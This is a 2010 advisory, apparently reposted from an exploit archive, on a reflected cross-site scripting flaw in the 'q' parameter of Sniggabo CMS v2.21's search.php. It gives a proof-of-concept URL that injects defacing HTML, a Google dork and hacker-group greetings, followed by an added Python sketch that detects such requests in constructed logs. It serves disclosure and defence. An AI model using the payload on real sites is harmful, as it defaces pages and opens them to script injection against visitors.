Sniggabo CMS v2.21 Cross Site Scripting Vulnerability

2010.03.25
Credit: Sora
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

--------------
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: "In your dreams, script kiddies."

# Description:
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter "q" of search.php.

# PoC:
http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh43d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp
# Popc0rn
# Revelation
# Max Mafiotu
# T3eS
# Timeb0mb
# [H]aruhiSuzumiya
# Xermes
# Mafia Boyz DZ Crew
# ??
# cyber-sec.org
# greyhathackers.wordpress.com
# incursioexsubter.info
#

References:

http://xforce.iss.net/xforce/xfdb/55472
http://www.exploit-db.com/exploits/11049
http://secunia.com/advisories/38029
http://packetstormsecurity.org/1001-exploits/sniggabocms-xss.txt
http://greyhathackers.wordpress.com/2010/01/07/sniggabo-cms-v2-21-xss-vulnerability/
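
A detection sketch for the issue described above, added here as an example and not part of the original advisory or the Sniggabo code base: it scans web-server access logs for requests to search.php whose q parameter decodes to HTML markup, and shows the entity-encoded form a correctly escaping page would emit. The log lines are constructed, and the combined log format and the helper names are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jan/2010:10:00:01 +0000] "GET /search.php?q=open+source+cms&site=www.google.ca HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Jan/2010:10:00:07 +0000] "GET /search.php?q=%3Ch1%3Etest%3C/h1%3E%3Chr%3E&site=www.google.ca HTTP/1.1" 200 5311',
    '203.0.113.9 - - [06/Jan/2010:10:00:09 +0000] "GET /search.php?q=%253Cb%253Etest HTTP/1.1" 200 5290',
    '203.0.113.7 - - [06/Jan/2010:10:00:12 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening or closing HTML tag, e.g. <h1>, </h1>, <hr>
TAG_RE = re.compile(r'<\s*/?\s*[a-zA-Z][^>]*>?')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_markup_in_q(log_lines, path="/search.php", param="q"):
    """Return (line_no, decoded_q, html_escaped_q) for requests whose q holds markup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != path:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if TAG_RE.search(value):
                # html.escape shows what a correctly encoding page would emit
                hits.append((n, value, html.escape(value, quote=True)))
    return hits


if __name__ == "__main__":
    for n, value, safe in find_markup_in_q(SAMPLE_LOG):
        print(f"line {n}: q={value!r} -> encoded output {safe!r}")
```
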


Copyright 2024, cxsecurity.com